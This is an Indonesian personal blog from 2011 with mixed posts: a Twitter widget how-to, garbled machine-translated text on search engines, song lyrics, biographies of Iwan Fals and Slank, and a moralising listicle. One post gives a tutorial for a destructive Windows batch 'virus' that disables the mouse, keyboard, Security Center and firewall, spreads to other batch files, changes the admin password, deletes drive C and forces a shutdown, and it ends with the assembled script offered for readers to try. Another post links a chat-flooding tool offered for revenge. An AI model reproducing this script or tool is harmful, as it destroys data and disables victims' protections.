Feb 6, 2011

cara simpel menambahkan widget twetter ke blog

just share, mungkin agan-agan semua udah pada tau,but mungkin ada teman-teman blogger atau teman-teman yang ga sengaja ingin menambahkan tweeter ke blog nya,nih simpel trik menambahkan widget tweeter ke dalam blog anda, chekidot

buka/login acount tweter anda, setelah itu klik PROFIL,
lalu klik lagi edit your profil,akan muncul jendela edit seperti di bawah ini dan klik profil,


setelah anda klik pada profil akan keluar tampilan seperti di bawah ini,


klik yang telah saya tandai persis pada gambar di atas,setelah anda klik ntar akan keluar jendela baru,kurang lebih seperti ini

stelah muncul jendela baru anda tinggal pilih widget apayang ingin anda pasang di blog anda, seperti ini




dan klik finish tinggal copy paste dah script nya di blog anda masing2,atau cara lebih mudah anda tinggal klik logo blogger dengan otomatis widget tweeter anda akan di tambahkan ke blog anda.setelah itu anda check deh blog anda maka akan muncul widget twetter anda, seperti di bawah ini






sederhana kan, selamat mencoba,and keep blogging.
read more...

Feb 5, 2011

cara kerja mesin pencari ( search engine

Mesin pencari dan direktori yang tidak menyediakan jasa dari kebaikan dalam hati mereka. Mereka adalah bisnis juga. Mereka memiliki garis bawah, juga. penghasilan mereka berasal terutama dari pengiklan. Apakah pengiklan dengan menggunakan lari dari banner situs model BPJ berjalan di bagian atas, atau jika mereka bayar per pengiklan-klik. Either way, pengiklan adalah bagaimana membuat mesin pencari uang mereka.
Berhubungan langsung dengan itu adalah jumlah lalu lintas yang mereka terima. Semakin banyak lalu lintas yang mereka terima, iklan semakin mereka dapat menampilkan (atau bayar per-klik beberapa iklan bisa mendapatkan klik), dan semakin banyak uang yang mereka dapatkan. Masalah untuk mesin pencari adalah bahwa mereka harus bersaing, seperti bisnis lain, untuk pelanggan. Oleh karena itu, seperti bisnis lain, pelanggan adalah raja. Dalam kasus search engine, pelanggan adalah orang yang menggunakan situs web mereka untuk melakukan pencarian.
Jika pengguna mesin pencari tidak dapat menemukan apa yang mereka cari di satu search engine, mereka akan pergi ke yang lain. Jika user pergi ke satu mesin pencari dan harus memilah-milah hasil yang tidak akurat sebelum mereka menemukan apa yang mereka cari, bahwa pengguna akan lebih dari mungkin mencoba mesin pencari lain. Oleh karena itu, kepentingan search engine terbaik untuk menyajikan hasil pencarian yang paling relevan mereka dapat, dengan harapan menjaga yang satu pelanggan.
Untuk melakukan hal ini, mesin pencari perlu menjelajahi jutaan website, parsing, mengkategorikan dan sertifikasi mereka. Mereka menyewa matematikawan paling cerdas untuk membuat "saus rahasia" mereka, yang merupakan algoritma yang mereka gunakan untuk mengkategorikan dan website peringkat. Meskipun mesin pencari adalah sebagai kemungkinan untuk memberikan algoritma mereka sebagai KFC adalah untuk memberikan formula rahasia mereka, mereka memberikan pedoman yang sangat baik untuk webmaster untuk mengikuti untuk mendapatkan peringkat maksimal dalam mesin pencari mereka.
read more...

Flood migg 33 BdRulezv5.0

 buat para pecinta chating mig33,yang mungkin dah bosen setiap kali chat mesti kena kick, kalau di ym kick = boot/ flood, neh ada softwere,mayanlah itung2 buat fun,alias bales dendam,dimari gan monggo di download






download
http://www.ziddu.com/download/13691688/BdRulezv5.0x.rar.html
read more...

Tanclev Antivirus Clever versi 1.0

mungkin ada diantara teman-teman yang berminat dengan antivirus ini,berikut tutorial nya


Creator : Teguh Aprianto
Included file : Tanclev v.1.0
Release : 02 Februari 2011
Tested : XP

Tanclev v.1.0 adalah Antivirus buatan anak indonesia yang masih duduk di kelas X. Yang sekarang bersekolah disekolah semi militer SMAN 04 (Binaan) SMa paling top. Tanclev v.1.0 mempunyai fitur terbaru yaitu, Tanclev USB Guard. Tanclev USB Beguna sebagai pelindung/menjaga data di flashdisk Tanclever agar tidak terinfeksi oleh virus. Walaupun terserang oleh virus Tanclev USB Guard akan melakukan scanning otomatis. dan akan menghapus virus yang terdeteksi.

CINTA PRODUK INDONESIA GAN DONWLOAD THIS

http://www.ziddu.com/download/13691689/TanclevAntivirusv.1.0.rar.html
read more...

Cara membuat VIRUS dengan Notepad

Virus ini dibuat dg Notepad dan di save as dg ekstension .bat
Jgn lupa utk merubah Save as type menjadi All files

BASIC

invisible command :
Quote:@echo off
Swap mouse :
Quote:rundll32 user,swapmousebutton
buka URL yg diinginkan :
Quote:start http://www.google.com
Shutdown kmptr & beri pesan :
Quote:shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse stlh Restart :
Quote:rundll32 mouse,disable
Disable keyboard stlh Restart :
Quote:rundll32 keyboard,disable
Freezes kmptr stlh Restart :
Quote:rundll32 user,disableoemlayer

Worm

memperbanyak diri didlm direktori :
ctty nul
Quote:for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
me-replace file batch yg lain :
Quote:%0 >>other.bat

Trojan

mngirim dftar file dlm direktori :
Quote:dir *.*>>Filelist.txt
ganti password admin :
Quote:net user administrator PASSWORD HERE
membuat info IP :
Quote:ipconfig >Computer-IP-address.txt

Perusak

copy ke Autorun :
Quote:COPY %0 %windir%WINSTART.BAT
format drive C :
Quote:format c: /q /autotest
delete Windows :
Quote:DELTREE /Y %windir%
delete drive C dg paksa :
Quote:DEL /F /S /Q C:
mematikan firewall & security center :
Quote:net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

Pause

pause smpai tekan smbarang tombol :
Quote:pause
pause 20 detik :
Quote:
Quote:@ping.exe 127.0.0.1 -n 20 -w 1000 > nul

Berikut hasil akhirnya :
Quote:@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Anda kena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
start http://www.youtube.com
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkan selamat tinggal pada komputermu!" -f

-disables mouse & keyboard
-copy ke AUTORUN
-stop Security Center
-display "Anda kena VIRUS!!!" selama 5 detik
-starts http://www.youtube.com
-disable firewall
-delete c: drive
-force shutdown dg pesan "Ucapkan selamat tinggal pada komputermu!"

GOOD LUCK SELAMAT MENCOBA 
read more...

Tools Online

just share,neh ada bebrapa tools online yang mantap,

PICTURE To ASCII Convert -
http://picascii.com

Whois - IP Address - Domain Name Lookup -
http://cqcounter.com/whois/

AdHoc IP Tools
http://tatumweb.com/iptools.htm

Ben's Web Utilities
http://www.phaster.com/find_info_net_traffic.html

central OPS
http://centralops.net/co/

dihe's IP Index
http://ipindex.homelinux.net/index.php

Domain Tools
http://www.domaintools.com/

Global Whois Search
http://www.ratite.com/whois/whois.html

Multi DNS Lookup (Bankes.com)
http://www.bankes.com/nslookup.htm

Network Solutions
http://www.networksolutions.com/whois/index.jsp

Public DNS Servers List
http://80.247.230.136/dns.htm

BGPPlay
http://www.ris.ripe.net/bgplay/

BrowserSpy
http://browserspy.dk/

CERT Station
http://browserspy.dk/

CIDR Reports (ASN & BGP Info)
http://www.cidr-report.org/as2.0/

CodeFlux Tools (SSL lookups)
http://codeflux.com/exec/tools/

Command Line Reference Page
http://www.ss64.com/

Country to IP Address Reference
http://www.proxyserverprivacy.com/ipaddress_range.php

Default Password List (another)
http://www.cyxla.com/passwords/passwords.html

DiG Gateway
http://www.spacereg.com/a.rpl?m=dig

digitalpoint DNS Zone Xfer
http://www.digitalpoint.com/tools/zone-transfer/

Fixed Orbit (ASN & BGP Info)
http://www.fixedorbit.com/search.htm

GeekTools (Does DNS AXFR)
http://www.geektools.com/tools.php

Graphical DNS Tools
http://www.zonecut.net/

HTTP Viewer
http://www.rexswain.com/httpview.html

InfoSysSec Online Tools
http://www.infosyssec.com/infosyssec/ipsectools.htm

Internet Topology Tools
http://www.caida.org/tools/taxonomy/topotaxonomy.xml

MD5 Hash Reverse Engineering Site
http://md5.rednoize.com/

Bermacam-macam ini cuy tinggal pilih
http://www.cybersnipers.com

Netcraft
http://news.netcraft.com/

Network-Tools (Does SSL lookups and chaos queries too)
http://www.us.sorbs.net/lookup.shtml

T1 Shopper Online Port Scanner
http://www.t1shopper.com/tools/

TechnicalInfo
http://www.technicalinfo.net/tools/index.html

Tiny URL (URL Decoder)
http://tinyurl.com/

TrimWare Online Tools
http://www.trimmail.com/news/tools/

User Agent Strings
http://www.useragentstring.com

Web Based Network Tools
http://home.planet.nl/%7Ehouwe135/wbnt1/

Web Probe
http://www.securityspace.com/sprobe/probe.html

Web Sniffer
http://web-sniffer.net/

Well Known Ports (plus trojans!)
http://www.neohapsis.com/neolabs/neo-ports/

Windows Event Id's
http://eventid.net/

siapa tahu ada yang butuh,selamat mencoba ga,insyallah masih bekerja dengan baik neh,happy blogging
read more...

7 Alasan Mengapa Cewek Harus Perawan Sampai Menikah

hehe,ga sengaja neh,nemu postingan di kaskus,jadi pengen ngepost nya di blog, chekidot gan,

Kenapa cewek harus tetap Virgin? Untuk pertanyaan ini sepertinya banyak sekali jawaban yang dapat diberikan, semua tergantung atau kembali kepada individu masing2. Akan tetapi di masa sekarang yang sudah semakin bebas ada baiknya perlu tahu apa saja kerugian-kerugian jika melakukan sex pra nikah.

Resiko dari sex pra nikah semua orang pasti sudah pada tahu, yaitu HAMIL dan akhirnya MBA alias Married By Accident (kalau sudah gini siapa yang malu…). Selain itu pula dengan sex pra nikah beresiko tertular penyakit kelamin, dan sebagainya. Sebenarnya dengan alasan di atas sudah cukup buat untuk tidak melakukan sex pra nikah. Tapi masih banyak alasan lainnya yang perlu untuk diketahui:

1. Sex Pra Nikah menyebabkan kamu akan dihantui perasaan bersalah
Sekali kamu melakukannya dan meskipun mungkin tidak ada seorangpun yang tahu, rasa bersalah akan selalu menghantui. Bahkan bisa jadi kamu akan menjadi benci pada dirimu sendiri karena tidak bisa menolak tekanan untuk melakukan hubungan sex. Perasaan seperti ini memang tidak mendominasi, tapi biasanya akan selalu muncul setiap waktu dan akan selalu menjadi bagian darimu.

2. Karena kamu bisa menjadi “sexual person“ dan segala sesuatunya tidak akan pernah lagi sama seperti semula
Seperti kalau pernah mencoba sesuatu benda additif lainnya, maka ada saatnya rasa kepingin atau ketagihan akan datang. Akibatnya, pikiran akan dipenuhi dengan sex dan menggangu konsentrasi untuk hal lainnya.
Dengan kata lain : dewasa sebelum waktunya.

3. Sex Pra Nikah akan mengubah cara pandangmu tentang sex – selamanya
Sex seharusnya sesuatu yang sakral dan menjadi sangat indah jika dilakukan oleh pasangan suami istri. Tapi jika dilakukan sebelum menikah, maka bisa jadi sex berubah menjadi sebagai suatu yang “kotor” dan terlarang. Cara pandang ini bisa terus tertanam di benak kamu, bahkan setelah kamu menikah nantinya. Sayang khan ?

4. Kamu akan sulit lepas dari “the first one”
Biasanya cewek merasakan ikatan yang sulit dilepas dengan cowok yang telah dia berikan virginitasnya. Ini tidak ada hubungan dengan ketakutan kalau-kalau tidak ada cowok lain yang akan menerima dia sesudah tidak virgin. Ini masalah psikologis. Padahal, cowok belum tentu merasakan hal yang sama.

5. Karena hubungan pacaran kamu bisa berubah menjadi “all about sex“
Pasangan pra nikah yang telah melakukan hubungan sex biasanya akan selalu mempunyai hidden agenda. Kapan dan dimana akan melakukannya…. Tidak jarang karena jadwal rahasia ini mereka harus berbohong, kepada siapa saja. Bentuk-bentuk perhatian akan menjadi bias. Apakah bener-bener tulus atau karena cuma sex. Bahkan terkadang sedang berantem hebatpun akan langsung baikan cuma gara-gara sex, dan melupakan masalah sesungguhnya.

6. Sex Pra Nikah, maka kamu tidak akan pernah menikmati surganya bulan madu
Karena sudah biasa melakukan hubungan sex pra nikah, maka bulan madu yang mestinya asyik dan romantis, bakal jadi seperti liburan biasa. Tidak akan pernah ada sesuatu yang berkesan untuk seumur hidupmu.


7. Karena kamu bisa menjaga reputasi dan tidak mau “nyesel” di kemudian hari
Hampir bisa dipastikan, teman-temannya akan tahu jika seorang cowok telah melakukan hubungan sex dengan pacarnya.

Jadi ini merupakan rahasia………….umum

semoga bermanfaat gan,brada and sista sekalian hehe

sumber

http://www.kaskus.us/showthread.php?t=6931553
read more...

Feb 4, 2011

BIOGRAFI IWANK FALS

Iwan Fals yang bernama lengkap Virgiawan Listanto (lahir 3 September 1961 di Jakarta) adalah seorang penyanyi beraliran balada yang menjadi salah satu legenda hidup di Indonesia. Lewat lagu-lagunya, Iwan menggambarkan suasana sosial kehidupan Indonesia (terutama Jakarta) di akhir tahun 1970-an hingga sekarang. Kritik atas perilaku sekelompok orang (seperti lagu Wakil Rakyat dan Tante Lisa), empati bagi kelompok marginal (misalnya lagu Siang Seberang Istana dan Lonteku), atau bencana besar yang melanda Indonesia (atau kadang-kadang di luar Indonesia, seperti lagu Ethiopia) mendominasi tema lagu-lagu yang dibawakannya.


Lewat lagu-lagunya, ia memotret kehidupan dan sosial-budaya di akhir tahun 1970-an hingga sekarang. Kritik atas perilaku sekelompok orang (seperti Wakil Rakyat, Tante Lisa), empati bagi kelompok marginal (misalnya Siang Seberang Istana, Lonteku), atau bencana besar yang melanda Indonesia (atau kadang-kadang di luar Indonesia, seperti Ethiopia) mendominasi tema lagu-lagu yang dibawakannya. Iwan Fals tidak hanya menyanyikan lagu ciptaannya tetapi juga sejumlah pencipta lain.

Iwan yang juga sempat aktif di kegiatan olahraga, pernah meraih gelar Juara II Karate Tingkat Nasional, Juara IV Karate Tingkat Nasional 1989, sempat masuk pelatnas dan melatih karate di kampusnya, STP (Sekolah Tinggi Publisistik). Iwan juga sempat menjadi kolumnis di beberapa tabloid olah raga.

Kharisma seorang Iwan Fals sangat besar. Dia sangat dipuja oleh kaum 'akar rumput'. Kesederhanaannya menjadi panutan para penggemarnya yang tersebar di seluruh Nusantara. Para penggemar fanatik Iwan Fals bahkan mendirikan sebuah yayasan pada tanggal 16 Agustus 1999 yang disebut Yayasan Orang Indonesia atau biasa dikenal dengan seruan Oi. Yayasan ini mewadahi aktifitas para penggemar Iwan Fals. Hingga sekarang kantor cabang Oi dapat ditemui setiap penjuru Nusantara dan beberapa bahkan sampai ke mancanegara.

Perjalanan Hidup
Masa kecil Iwan Fals dihabiskan di Bandung, kemudian ikut saudaranya di Jeddah, Arab Saudi selama 8 bulan. Bakat musiknya makin terasah ketika ia berusia 13 tahun, di mana Iwan banyak menghabiskan waktunya dengan mengamen di Bandung. Bermain gitar dilakukannya sejak masih muda bahkan ia mengamen untuk melatih kemampuannya bergitar dan mencipta lagu. Ketika di SMP, Iwan menjadi gitaris dalama paduan suara sekolah.



Selanjutnya, datang ajakan untuk mengadu nasib di Jakarta dari seorang produser. Ia lalu menjual sepeda motornya untuk biaya membuat master. Iwan rekaman album pertama bersama rekan-rekannya, Toto Gunarto, Helmi, Bambang Bule yang tergabung dalam Amburadul. Tapi album tersebut gagal di pasaran dan Iwan kembali menjalani profesi sebagai pengamen.

Setelah dapat juara di festival musik country, Iwan ikut festival lagu humor. Arwah Setiawan (almarhum), lagu-lagu humor milik Iwan sempat direkam bersama Pepeng, Krisna, Nana Krip dan diproduksi oleh ABC Records. Tapi juga gagal dan hanya dikonsumsi oleh kalangan tertentu saja. Sampai akhirnya, perjalanan Iwan bekerja sama dengan Musica Studio. Sebelum ke Musica, Iwan sudah rekaman sekitar 4-5 album. Di Musica, barulah lagu-lagu Iwan digarap lebih serius. Album Sarjana Muda, misalnya, musiknya ditangani oleh Willy Soemantri.

Iwan tetap menjalani profesinya sebagai pengamen. Ia mengamen dengan mendatangi rumah ke rumah, kadang di Pasar Kaget atau Blok M. Album Sarjana Muda ternyata banyak diminati dan Iwan mulai mendapatkan berbagai tawaran untuk bernyanyi. Kemudian sempat masuk televisi setelah tahun 1987. Waktu siaran acara Manasuka Siaran Niaga di TVRI, lagu Oemar Bakri sempat ditayangkan di TVRI. Ketika anak kedua Iwan, Cikal lahir tahun 1985, kegiatan mengamen langsung dihentikan.

Selama Orde Baru, banyak jadwal acara konser Iwan yang dilarang dan dibatalkan oleh aparat pemerintah, karena lirik-lirik lagunya yang kritis.

Saat bergabung dengan kelompok SWAMI dan merilis album bertajuk SWAMI pada 1989, nama Iwan semakin meroket dengan mencetak hits Bento dan Bongkar yang sangat fenomenal. Perjalanan karir Iwan Fals terus menanjak ketika dia bergabung dengan Kantata Takwa pada 1990 yang di dukung penuh oleh pengusaha Setiawan Djodi. Konser-konser Kantata Takwa saat itu sampai sekarang dianggap sebagai konser musik yang terbesar dan termegah sepanjang sejarah musik Indonesia.

Keluarga
Iwan lahir di Jakarta pada 3 September 1961 dari pasangan Haryoso (ayah)(almarhum) dan Lies (ibu). Iwan menikahi Rosanna (Mbak Yos) dan mempunyai anak Galang Rambu Anarki (almarhum), Annisa Cikal Rambu Basae, dan Rayya Rambu Robbani.

Galang mengikuti jejak ayahnya terjun di bidang musik. Walaupun demikian, musik yang ia bawakan berbeda dengan yang telah menjadi trade mark ayahnya. Galang kemudian menjadi gitaris kelompok Bunga dan sempat merilis satu album perdana menjelang kematiannya.

Nama Galang juga dijadikan salah satu lagu Iwan, berjudul Galang Rambu Anarki pada album Opini , yang bercerita tentang kegelisahan orang tua menghadapi kenaikan harga-harga barang sebagai imbas dari kenaikan harga BBM pada awal tahun 1981 yaitu pada hari kelahiran Galang (1 Januari 1981).

Nama Cikal sebagai putri kedua juga diabadikan sebagai judul album dan judul lagu Iwan Fals yang terbit tahun 1991.

Galang Rambu Anarki meninggal pada bulan April 1997 secara mendadak yang membuat aktifitas bermusik Iwan Fals sempat vakum selama beberapa tahun. Galang dimakamkan di pekarangan rumah Iwan Fals di desa Leuwinanggung Bogor Jawa Barat sekitar satu jam perjalanan dari Jakarta. Sepeninggal Galang, Iwan sering menyibukkan diri dengan melukis dan berlatih bela diri.

Pada tahun 2002 Iwan mulai aktif lagi membuat album setelah sekian lama menyendiri dengan munculnya album Suara Hati yang di dalamnya terdapat lagu Hadapi Saja yang bercerita tentang kematian Galang Rambu Anarki. Pada lagu ini istri Iwan Fals (Yos) juga ikut menyumbangkan suaranya.

Kharisma seorang Iwan Fals sangat besar. Kesederhanaannya menjadi panutan para penggemarnya yang tersebar diseluruh nusantara. Para penggemar fanatik Iwan Fals bahkan mendirikan sebuah yayasan pada tanggal 16 Agustus 1999 yang dinamakan Yayasan Orang Indonesia atau biasa dikenal dengan sebutan Oi. Yayasan ini mewadahi aktifitas para penggemar Iwan Fals.

Sumber
read more...

Feb 3, 2011

SLANK - Fuckin politik

Vibrations of the music rhytim
Make you groovin’, moving dancin’
Then became intrance
Funkin politik don’t like the etiks

Funkin politik politikus, tikus mampus
Funkin politik si tikus takut sama sipus
Don’t look the government sights
There’s too much hipokrit fights

Don’t see the government eyes
You better look into my arts

download lagu
http://www.ziddu.com/download/13670657/09FunkinPolitik.mp3.html
read more...

SLANK-jakarta pagi ini

      Pagi dingin 'gak ada sinar mentari
      Dan langitpun terlihat gelap, mendung datang lagi
      Dan aku berdiri diatas gedung yang tinggi
      Memangdang ramainya Jakarta menyambut pagi ini

      Reff I:
      Aku disini... sendiri
      Aku disini... oh sepi
      Mengapa aku disini
      Jakarta pagi ini
      Pagi sunyi 'gak ada burung bernyanyi
      Putih embunpun kini telah terkontaminasi
      Aku seperti terbang nggak menginjak bumi
      Diantara merahnya emosi Jakarta yang s'makin ternodai

      Kembali ke: Reff I
      Aku disini walau apa yang terjadi sampai aku mati
      Tempatku bukan di sini
      Jakarta, jakarta pagi ini

      Reff II:
      Aku disini... sendiri
      Aku disini... oh sepi
      Tempatku bukan disini
      Jakarta pagi ini

      Kembali ke: Reff II
      Oh disini... sendiri
      Disini.. oh sepi
      Tempatku bukan disini
      Jakarta pagi ini


DownloaD LagU
read more...

BIOGRAFI SLANK

Siapa yang tak mengenal band legendaris satu ini,band yang suka bermain di genre blues dan rock ini,begitu populer,dan memiliki fans2 fanataik,mungkin diantara anda ada yang ngefans banget ama nih band,termasuk juga saya sendiri,band paling saya idola in nih,nah,mungkin diantara teman2 sahabat SLANKER ada yang belum mengetahui biografi,atau sejarah berdiri nya SLANK,hingga saat ini, baru2 saja saya membaca sebuah referensi tentang biografi nya SLANK,cekidot: 

slank Cikal bakal lahirnya Slank adalah sebuah grup bernama Cikini Stones Complex (CSC) bentukan Bimo Setiawan Sidharta (Bimbim) pada awal tahun 80an. Band ini hanya memainkan lagu-lagu Rolling Stones dan tak mau memainkan lagu dari band lain, alhasil mereka akhirnya jenuh dan menjelang akhir tahun 1983 grup ini dibubarkan. Semangat bermusik Bimbim yang masih membara membawanya kembali membentuk band baru bernama Setan Merah bareng dua saudaranya, Denny dan Erwan. Untuk menambah amunisi, Bimbim lantas mengajak Bongky untuk mengisi posisi gitaris. Pada bulan Desember 1983 mereka ganti nama menjadi Slank, sebuah nama yang diambil begitu saja dari cemoohan orang yang sering menyebut mereka cowok selengean. Formasi Slank ketika pertama kali didirikan adalah Erwan (Vokal), Bongky (Gitar), Denny (Bass), Kiki (Keyboard) dan Bimbim (Drum). Mereka sempat tampil di beberapa pentas dengan membawakan lagu-lagu sendiri sebelum Erwan memutuskan mundur karena merasa tidak punya harapan di Slank. Tak lama kemudian Parlin Burman (Pay) dan Akhadi Wira Satriaji (Kaka) bergabung dengan Slank, disusul dengan masuknya Indra Chandra Setiadi (Indra) beberapa tahun kemudian. Dengan formasi Bimbim (Drum), Bongky (Bass), Pay (Gitar), Kaka (Vokal) dan Indra (Keyboard) mereka mulai membuat demo untuk ditawarkan ke perusahaan rekaman. Setelah berulang kali ditolak, akhirnya tahun 1990 demonya diterima dan mulai rekaman debut album Suit-Suit... He He He (Gadis Sexy). Album yang menampilkan hit Memangdan Maafkan itu meledak dipasaran sehingga mereka pun diganjar BASF Award untuk kategori pendatang baru terbaik. Album kedua mereka, Kampungan pun meraih sukses yang sama. Keterlibatan para personelnya dengan narkoba sempat melahirkan keretakan di tubuh band yang bermarkas di jalan Potlot ini. Pada saat menggarap album keenam (Lagi Sedih), Bimbim selaku leader akhirnya memutuskan untuk memecat Bongky, Pay dan Indra. Sebagai gantinya mereka merekrut Ivanka (Bass), Mohamad Ridho Hafiedz (Ridho) dan Abdee Negara (Abdee). Formasi ini bertahan hingga saat ini dan mereka terus melahirkan karya-karya yang menegaskan eksistensi mereka di dunia musik Indonesia. Mereka sempat tampil di beberapa pentas dengan membawakan lagu-lagu sendiri sebelum Erwan memutuskan mundur karena merasa tidak punya harapan di Slank.Dengan perjuangan panjang terbentuklah formasi ke-13, Bimbim, Kaka, Bongky, Pay dan Indra, Slank baru solid. Dengan formasi Bimbim (Drum), Bongky (Bass), Pay (Gitar), Kaka (Vokal) dan Indra (Keyboard) mereka mulai membuat demo untuk ditawarkan ke perusahaan rekaman. Setelah berulang kali ditolak, akhirnya tahun 1990 demonya diterima dan mulai rekaman debut album Suit-Suit... He He He (Gadis Sexy). Album yang menampilkan hit Memang dan Maafkan itu meledak dipasaran sehingga mereka pun diganjar BASF Award untuk kategori pendatang baru terbaik. Album kedua mereka, Kampungan pun meraih sukses yang sama. Pada saat menggarap album keenam (Lagi Sedih), Bimbim selaku leader akhirnya memutuskan untuk memecat Bongky, Pay dan Indra. Kaka dan Bimbim tetap menggarap album ke-6 dengan bantuan additional player. Sebagai gantinya mereka merekrut Ivanka (Bass), Mohamad Ridho Hafiedz (Ridho) dan Abdee Negara (Abdee). Formasi ini bertahan hingga saat ini dan mereka terus melahirkan karya-karya yang menegaskan eksistensi mereka di dunia musik Indonesia.

TERJERAT NYA KAKA DAN BIMBIM KEDALAM DUNIA NARKOBA
Narkoba Terbujuk rayuan teman di Bali 14 tahun lalu, Bimbim—penabuh drum grup musik Slank—dan keponakannya, Kaka—vokalis Slank—pun mencecapi ”obat langit” yang membuat pemakainya melayang-layang dan ketagihan. Waktu pertama kali mencoba (1994), mereka bilang badan jadi tidak enak. Muntah-muntah. Enek. Tapi kok besok paginya mencari lagi? Itulah putau, sekali pakai orang langsung ketagihan. Maka berlanjutlah ia memakai putau. Semenjak memakai jenis narkoba ini, Bimbim yang biasanya pendiam, rapi, tak suka teriak-teriak, tiba-tiba berubah. Demikian juga Kaka. Banyak pengalaman pahit, dari sejak mereka pakai (1994) sampai tahun 1999. Pengalaman di Lubuk Linggau (1998) juga tak terlupakan. Mereka ”kehabisan barang”, sakau. Tidak ada orang jual barang seperti itu di Lubuk Linggau. Bimbim sampai tidak bisa bangun, di kamar. Padahal mereka masih harus melayani wartawan, wawancara. Tinggal Kaka, yang badannya lebih kuat, melayani wartawan, meski dengan susah payah. Slank membantah anggapan bahwa dengan mengkonsumsi Narkoba seorang seniman bisa lebih kreatif, justru sebaliknya, tanpa menggunakan barang haram tersebut mereka terbukti bisa menghasilkan karya-karya bagus. "Saat membikin album pertama hingga ketiga, kami belum memakai Narkoba, tapi album itu terbukti paling bagus. Jadi, tanpa Narkoba kami bisa menghasilkan karya yang bagus. Setelah album ketiga, kami menjadi pengguna," ujar Kaka. 

PERPECAHAN DI KUBU SLANK
Pada saat menggarap album keenam (Lagi Sedih), Bimbim selaku leader akhirnya memutuskan untuk memecat Bongky, Pay dan Indra. Namun ada juga yang menyebutkan bahwa Bongky, Indra dan Pay keluar atau mengundurkan diri karena perilaku Bimbim dan Kaka yang sudah terlampau parah dalam penggunaan narkoba. Perpecahan tersebut sebenarnya sudah bisa terlihat di album ke empat mereka di lagu Pisah Saja Dulu. Bimbim bahkan berniat untuk membubarkan Slank. Namun sebuah surat yang ditulis dengan darah oleh seorang Slanker membuatnya mengurungkan niatnya. Isinya menyeramkan. Dia bersumpah untuk membunuh Bimbim jika Bimbim benar benar melaksanakan niatnya untuk membubarkan Slank. Kaka dan Bimbim tetap menggarap album ke-6 dengan bantuan additional player. Reynold masuk untuk mengisi posisi gitar dan Ivanka yang waktu itu sering nongkrong di Potlot juga ikut membantu dalam mengerjakan project Slank untuk album ke enam dengan formasi masa transisi ini.
Album Lagi Sedih pun dirilis pada Februari 1997. Dengan single Koepoe Liarkoe dan Tong Kosong membuktikan Slank masih survive. Tawaran manggung pun berdatangan. Dan saat tinggal beberapa kota yang akan diselesaikan dalam rangkaian show nya,, Reynold menyatakan ingin keluar dari Slank. Alasannya karena beliau juga tidak kuat karena Bimbim dan Kaka yang saat itu masih terjerumus dengan narkoba. Walaupun saat itu sudah dibujuk untuk menunda pengunduran dirinya,, Reynold tetap tidak ingin melanjutkan sisa show nya. Saat itu lah reformasi di tubuh Slank terjadi.
FORMASI AKHIR + BIOGRAFI PENDEK PERSONIL
Ivanka ditarik menjadi member resmi. Slank yang sepeninggal Reynold langsung bergerak cepat. Management langsung mencari orang untuk untuk menyelesaikan sisa show di beberapa kota. Ivanka merekomendasikan Abdee Negara untuk membantu Slank. Abdee dan Ivanka memang sebelumnya sudah bersahabat dan psatu Band di Flash. Sedangkan manager Slank waktu itu,,Mbak Wiwid mengontak Mohammad ridwan Hafiedz (Ridho) yang baru saja menyelesaikan sekolah gitarnya di Hollywood untuk diminta bantuannya. Mereka pun ditugaskan untuk menghafal 35 lagu Slank dalam waktu satu minggu. Sebuah target yang besar dan waktu yang singkat. Namun mungkin karena dua orang itu adalah seorang musisi yang hebat,, target tersebut tercapai. Dengan adanya dua gitaris ini sebenarnya sangat membingungkan juga karena sebelumnya Slank hanya memakai satu gitaris. Namun karena mepetnya waktu,, akhirnya dua orang tersebut dipake untuk melengkapi formasi inti Slank. Formasi ini bertahan hingga saat ini dan mereka terus melahirkan karya-karya yang menegaskan eksistensi mereka di dunia musik Indonesia.
dan inilah formasi akhir dari slank,dan berikut biografi masing-masing personil
Bimo Setiawan Almachzumi(DRUMMER)

Bimo Setiawan Almachzumi (lahir di Jakarta, 25 Desember 1966; umur 43 tahun; kerap disapa dengan panggilan Bim-Bim) adalah pemusik serta pendiri dari grup musik Indonesia, Slank. Di grup Slank, Bim-bim memainkan instrumen drum.

Dalam perjalanannya, mereka mengalami perombakan personil hingga akhirnya terbentuk formasi ke-14 pada 1996 yang bertahan sampai sekarang. Formasi terakhir, yang dimulai dari album ketujuh Slank, terdiri dari Bimbim (drum), Kaka (vokal), Ivanka (bass), Ridho (gitar) dan Abdee (gitar).
Profil Lengkapnya
nama : Bimo Setiawan Almachzumi 
tempat tanggal lahir : Jakarta, 25 Desember 1966
agama: Islam
genre: blues , rock
